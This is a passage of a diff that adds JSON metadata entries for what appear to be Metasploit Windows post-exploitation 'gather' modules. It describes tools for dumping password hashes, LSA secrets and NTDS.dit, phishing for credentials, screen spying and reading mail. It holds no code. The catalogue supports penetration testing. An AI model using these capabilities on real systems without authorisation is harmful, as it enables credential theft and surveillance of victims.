You will get\n information such as: The installation path, Tomcat version, port, web applications,\n users, passwords, roles, etc.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_tomcat.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_tomcat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_trusted_locations": { + "name": "Windows Gather Microsoft Office Trusted Locations", + "fullname": "post/windows/gather/enum_trusted_locations", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "vysec " + ], + "description": "This module will enumerate the Microsoft Office trusted locations on the target host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_trusted_locations.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_trusted_locations", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_unattend": { + "name": "Windows Gather Unattended Answer File Enumeration", + "fullname": "post/windows/gather/enum_unattend", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Sean Verity ", + "sinn3r ", + "Ben Campbell ", + 
"GhostlyBox" + ], + "description": "This module will check the file system for a copy of unattend.xml and/or\n autounattend.xml found in Windows Vista, or newer Windows systems. And then\n extract sensitive information such as usernames and decoded passwords. Also\n checks for '.vmimport' files that could have been created by the AWS EC2 VMIE service.", + "references": [ + "URL-http://technet.microsoft.com/en-us/library/ff715801", + "URL-http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx", + "URL-http://technet.microsoft.com/en-us/library/c026170e-40ef-4191-98dd-0b9835bfa580", + "URL-https://aws.amazon.com/security/security-bulletins/AWS-2024-006/", + "URL-https://www.immersivelabs.com/blog/the-return-of-unattend-xml-revenge-of-the-cleartext-credentials/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_unattend.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_unattend", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/exchange": { + "name": "Windows Gather Exchange Server Mailboxes", + "fullname": "post/windows/gather/exchange", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "SophosLabs Offensive Security team" + ], + "description": "This module will gather information from an on-premise Exchange Server running on the target machine.\n\n Two actions are supported:\n LIST (default action): List basic information about all Exchange servers and mailboxes hosted on the target.\n EXPORT: Export and download a chosen mailbox in the form of a .PST file, with support for an optional 
filter keyword.\n\n For a list of valid filters, see https://docs.microsoft.com/en-us/exchange/filterable-properties-for-the-contentfilter-parameter\n\n The executing user has to be assigned to the \"Organization Management\" role group for the module to successfully run.\n\n Tested on Exchange Server 2010 on Windows Server 2012 R2 and Exchange Server 2016 on Windows Server 2016.", + "references": [ + "URL-https://github.com/sophoslabs/metasploit_gather_exchange", + "URL-https://news.sophos.com/en-us/2021/03/09/sophoslabs-offensive-security-releases-post-exploitation-tool-for-exchange/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/exchange.rb", + "is_install_path": true, + "ref_name": "windows/gather/exchange", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "EXPORT", + "description": "Export and download a chosen mailbox in the form of a .PST file, with support for an optional filter keyword" + }, + { + "name": "LIST", + "description": "List basic information about all Exchange servers and mailboxes hosted on the target" + } + ] + }, + "post_windows/gather/file_from_raw_ntfs": { + "name": "Windows File Gather File from Raw NTFS", + "fullname": "post/windows/gather/file_from_raw_ntfs", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Danil Bazin " + ], + "description": "This module gathers a file using the raw NTFS device, bypassing some Windows restrictions\n such as open file with write lock. 
Because it avoids the usual file locking issues, it can\n be used to retrieve files such as NTDS.dit.", + "references": [ + "URL-http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-03 12:57:40 +0000", + "path": "/modules/post/windows/gather/file_from_raw_ntfs.rb", + "is_install_path": true, + "ref_name": "windows/gather/file_from_raw_ntfs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/forensics/browser_history": { + "name": "Windows Gather Skype, Firefox, and Chrome Artifacts", + "fullname": "post/windows/gather/forensics/browser_history", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Joshua Harper " + ], + "description": "Gathers Skype chat logs, Firefox history, and Chrome history data from the target machine.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/forensics/browser_history.rb", + "is_install_path": true, + "ref_name": "windows/gather/forensics/browser_history", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/forensics/duqu_check": { + "name": "Windows Gather Forensics Duqu Registry Check", + "fullname": "post/windows/gather/forensics/duqu_check", + "aliases": [], + "rank": 300, + 
"disclosure_date": null, + "type": "post", + "author": [ + "Marcus J. Carey " + ], + "description": "This module searches for CVE-2011-3402 (Duqu) related registry artifacts.", + "references": [ + "CVE-2011-3402", + "URL-http://r-7.co/w5h7fY" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/forensics/duqu_check.rb", + "is_install_path": true, + "ref_name": "windows/gather/forensics/duqu_check", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/forensics/enum_drives": { + "name": "Windows Gather Physical Drives and Logical Volumes", + "fullname": "post/windows/gather/forensics/enum_drives", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Wesley McGrew " + ], + "description": "This module will list physical drives and logical volumes", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/forensics/enum_drives.rb", + "is_install_path": true, + "ref_name": "windows/gather/forensics/enum_drives", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/forensics/fanny_bmp_check": { + "name": "FannyBMP or DementiaWheel Detection Registry Check", + "fullname": "post/windows/gather/forensics/fanny_bmp_check", + "aliases": [], + "rank": 
300, + "disclosure_date": null, + "type": "post", + "author": [ + "William M." + ], + "description": "This module searches for the Fanny.bmp worm related reg keys.\n fannybmp is a worm that exploited zero day vulns\n (more specifically, the LNK Exploit CVE-2010-2568).\n Which allowed it to spread even if USB Autorun was turned off.\n This is the same exploit that was used in StuxNet.", + "references": [ + "URL-https://securelist.com/a-fanny-equation-i-am-your-father-stuxnet/68787", + "CVE-2010-2568" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/windows/gather/forensics/fanny_bmp_check.rb", + "is_install_path": true, + "ref_name": "windows/gather/forensics/fanny_bmp_check", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/forensics/imager": { + "name": "Windows Gather Forensic Imaging", + "fullname": "post/windows/gather/forensics/imager", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Wesley McGrew " + ], + "description": "This module will perform byte-for-byte imaging of remote disks and volumes.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/forensics/imager.rb", + "is_install_path": true, + "ref_name": "windows/gather/forensics/imager", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + 
"meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/forensics/nbd_server": { + "name": "Windows Gather Local NBD Server", + "fullname": "post/windows/gather/forensics/nbd_server", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Wesley McGrew " + ], + "description": "Maps remote disks and logical volumes to a local Network Block Device server.\n Allows for forensic tools to be executed on the remote disk directly.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/forensics/nbd_server.rb", + "is_install_path": true, + "ref_name": "windows/gather/forensics/nbd_server", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/forensics/recovery_files": { + "name": "Windows Gather Deleted Files Enumeration and Recovering", + "fullname": "post/windows/gather/forensics/recovery_files", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "This module lists and attempts to recover deleted files from NTFS file systems. Use\n the FILES option to guide recovery. Leave this option empty to enumerate deleted files in the\n DRIVE. Set FILES to an extension (e.g., \"pdf\") to recover deleted files with that\n extension, or set FILES to a comma separated list of IDs (from enumeration) to\n recover those files. The user must have account file enumeration. 
Recovery\n may take a long time; use the TIMEOUT option to abort enumeration or recovery by\n extension after a specified period (in seconds).", + "references": [ + "URL-https://www.youtube.com/watch?v=9yzCf360ujY&hd=1" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/windows/gather/forensics/recovery_files.rb", + "is_install_path": true, + "ref_name": "windows/gather/forensics/recovery_files", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/get_bookmarks": { + "name": "Bookmarked Sites Retriever", + "fullname": "post/windows/gather/get_bookmarks", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "jerrelgordon" + ], + "description": "This module discovers information about a target by retrieving their bookmarked websites on Google Chrome, Opera and Microsoft Edge.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-11 14:29:36 +0000", + "path": "/modules/post/windows/gather/get_bookmarks.rb", + "is_install_path": true, + "ref_name": "windows/gather/get_bookmarks", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/hashdump": { + "name": "Windows Gather Local User Account Password Hashes (Registry)", + "fullname": "post/windows/gather/hashdump", + "aliases": [], + "rank": 300, + 
"disclosure_date": null, + "type": "post", + "author": [ + "hdm " + ], + "description": "This module will dump the local user accounts from the SAM database using the registry", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/hashdump.rb", + "is_install_path": true, + "ref_name": "windows/gather/hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/local_admin_search_enum": { + "name": "Windows Gather Local Admin Search", + "fullname": "post/windows/gather/local_admin_search_enum", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Brandon McCann \"zeknox\" ", + "Thomas McCarthy \"smilingraccoon\" ", + "Royce Davis \"r3dy\" " + ], + "description": "This module will identify systems in a given range that the\n supplied domain user (should migrate into a user pid) has administrative\n access to by using the Windows API OpenSCManagerA to establishing a handle\n to the remote host. 
Additionally it can enumerate logged in users and group\n membership via Windows API NetWkstaUserEnum and NetUserGetGroups.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/local_admin_search_enum.rb", + "is_install_path": true, + "ref_name": "windows/gather/local_admin_search_enum", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/lsa_secrets": { + "name": "Windows Enumerate LSA Secrets", + "fullname": "post/windows/gather/lsa_secrets", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Rob Bathurst " + ], + "description": "This module will attempt to enumerate the LSA Secrets keys within the registry. The registry value used is:\n HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. 
Thanks goes to Maurizio Agazzini and Mubix for decrypt\n code from cachedump.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/lsa_secrets.rb", + "is_install_path": true, + "ref_name": "windows/gather/lsa_secrets", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/make_csv_orgchart": { + "name": "Generate CSV Organizational Chart Data Using Manager Information", + "fullname": "post/windows/gather/make_csv_orgchart", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Stuart Morgan " + ], + "description": "This module will generate a CSV file containing all users and their managers, which can be\n imported into Visio which will render it.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/make_csv_orgchart.rb", + "is_install_path": true, + "ref_name": "windows/gather/make_csv_orgchart", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/memory_dump": { + "name": "Windows Process Memory Dump", + "fullname": "post/windows/gather/memory_dump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "smashery" + ], + "description": "This module creates a memory dump of a 
process (to disk) and downloads the file\n for offline analysis.\n\n Options for DUMP_TYPE affect the completeness of the dump:\n\n \"full\" retrieves the entire process address space (all allocated pages);\n \"standard\" excludes image files (e.g. DLLs and EXEs in the address space) as\n well as memory mapped files. As a result, this option can be significantly\n smaller in size.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/memory_dump.rb", + "is_install_path": true, + "ref_name": "windows/gather/memory_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/memory_grep": { + "name": "Windows Gather Process Memory Grep", + "fullname": "post/windows/gather/memory_grep", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "bannedit " + ], + "description": "This module allows for searching the memory space of a process for potentially\n sensitive data. 
Please note: When the HEAP option is enabled, the module will have\n to migrate to the process you are grepping, and will not migrate back automatically.\n This means that if the user terminates the application after using this module, you\n may lose your session.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/memory_grep.rb", + "is_install_path": true, + "ref_name": "windows/gather/memory_grep", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/netlm_downgrade": { + "name": "Windows NetLM Downgrade Attack", + "fullname": "post/windows/gather/netlm_downgrade", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Brandon McCann \"zeknox\" ", + "Thomas McCarthy \"smilingraccoon\" " + ], + "description": "This module changes the system LmCompatibilityLevel registry value\n to enable sending LM challenge hashes and initiates a SMB connection\n to the host specified in the SMBHOST module option. 
If an SMB server\n is listening, it will receive the NetLM hashes for the session user.", + "references": [ + "URL-https://web.archive.org/web/20210311141729/https://www.optiv.com/explore-optiv-insights/blog/post-exploitation-using-netntlm-downgrade-attacks", + "URL-https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level", + "URL-https://support.microsoft.com/en-us/topic/security-guidance-for-ntlmv1-and-lm-network-authentication-da2168b6-4a31-0088-fb03-f081acde6e73" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-10-01 22:35:11 +0000", + "path": "/modules/post/windows/gather/netlm_downgrade.rb", + "is_install_path": true, + "ref_name": "windows/gather/netlm_downgrade", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "config-changes" + ] + }, + "session_types": [ + "meterpreter", + "shell", + "powershell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/ntds_grabber": { + "name": "NTDS Grabber", + "fullname": "post/windows/gather/ntds_grabber", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Koen Riepe (koen.riepe " + ], + "description": "This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller.\n It compresses all these files in a cabinet file called All.cab.", + "references": [], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/ntds_grabber.rb", + "is_install_path": true, + "ref_name": "windows/gather/ntds_grabber", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/ntds_location": { + "name": "Post Windows Gather NTDS.DIT Location", + "fullname": "post/windows/gather/ntds_location", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Stuart Morgan " + ], + "description": "This module will find the location of the NTDS.DIT file (from the Registry),\n check that it exists, and display its location on the screen, which is useful\n if you wish to manually acquire the file using ntdsutil or vss.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/ntds_location.rb", + "is_install_path": true, + "ref_name": "windows/gather/ntds_location", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/outlook": { + "name": "Windows Gather Outlook Email Messages", + "fullname": "post/windows/gather/outlook", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Wesley Neelen " + ], + "description": "This module allows reading and searching email messages from the local\n Outlook installation using PowerShell. Please note that this module is\n manipulating the victims keyboard/mouse. If a victim is active on the target\n system, he may notice the activities of this module. 
Tested on Windows 8.1\n x64 with Office 2013.", + "references": [], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/outlook.rb", + "is_install_path": true, + "ref_name": "windows/gather/outlook", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "LIST", + "description": "Lists all folders" + }, + { + "name": "SEARCH", + "description": "Searches for an email" + } + ] + }, + "post_windows/gather/phish_windows_credentials": { + "name": "Windows Gather User Credentials (phishing)", + "fullname": "post/windows/gather/phish_windows_credentials", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Wesley Neelen ", + "Matt Nelson" + ], + "description": "This module is able to perform a phishing attack on the target by popping up a loginprompt.\n When the user fills credentials in the loginprompt, the credentials will be sent to the attacker.\n The module is able to monitor for new processes and popup a loginprompt when a specific process is starting. 
Tested on Windows 7.", + "references": [], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/phish_windows_credentials.rb", + "is_install_path": true, + "ref_name": "windows/gather/phish_windows_credentials", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/psreadline_history": { + "name": "Windows Gather PSReadline History", + "fullname": "post/windows/gather/psreadline_history", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Garvit Dewan " + ], + "description": "Gathers Power Shell history data from the target machine.", + "references": [ + "URL-https://docs.microsoft.com/en-us/powershell/module/psreadline/", + "URL-https://github.com/KalibRx/PoshHarvestPy/blob/master/poshharvest.py", + "URL-https://0xdf.gitlab.io/2018/11/08/powershell-history-file.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/psreadline_history.rb", + "is_install_path": true, + "ref_name": "windows/gather/psreadline_history", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/resolve_sid": { + "name": "Windows Gather Local User Account SID Lookup", + "fullname": "post/windows/gather/resolve_sid", + "aliases": [], + "rank": 300, + 
"disclosure_date": null, + "type": "post", + "author": [ + "chao-mu" + ], + "description": "This module prints information about a given SID from the perspective\n of this session.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/resolve_sid.rb", + "is_install_path": true, + "ref_name": "windows/gather/resolve_sid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/screen_spy": { + "name": "Windows Gather Screen Spy", + "fullname": "post/windows/gather/screen_spy", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Roni Bachar ", + "bannedit ", + "kernelsmith ", + "Adrian Kubok", + "DLL_Cool_J" + ], + "description": "This module will incrementally take desktop screenshots from the host. 
This\n allows for screen spying which can be useful to determine if there is an active\n user on a machine, or to record the screen for later data extraction.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/screen_spy.rb", + "is_install_path": true, + "ref_name": "windows/gather/screen_spy", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/smart_hashdump": { + "name": "Windows Gather Local and Domain Controller Account Password Hashes", + "fullname": "post/windows/gather/smart_hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This will dump local accounts from the SAM Database. 
If the target\n host is a Domain Controller, it will dump the Domain Account Database using the proper\n technique depending on privilege level, OS and role of the host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/smart_hashdump.rb", + "is_install_path": true, + "ref_name": "windows/gather/smart_hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/tcpnetstat": { + "name": "Windows Gather TCP Netstat", + "fullname": "post/windows/gather/tcpnetstat", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mubix " + ], + "description": "This module lists current TCP sessions.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/tcpnetstat.rb", + "is_install_path": true, + "ref_name": "windows/gather/tcpnetstat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/usb_history": { + "name": "Windows Gather USB Drive History", + "fullname": "post/windows/gather/usb_history", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "nebulus" + ], + "description": "This module will enumerate USB Drive history on a target host.", + "references": [], + "platform": "Windows", 
+ "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/usb_history.rb", + "is_install_path": true, + "ref_name": "windows/gather/usb_history", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/win_privs": { + "name": "Windows Gather Privileges Enumeration", + "fullname": "post/windows/gather/win_privs", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Merlyn Cousins " + ], + "description": "This module will print if UAC is enabled, and if the current account is\n ADMIN enabled. It will also print UID, foreground SESSION ID, is SYSTEM status\n and current process PRIVILEGES.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/win_privs.rb", + "is_install_path": true, + "ref_name": "windows/gather/win_privs", + 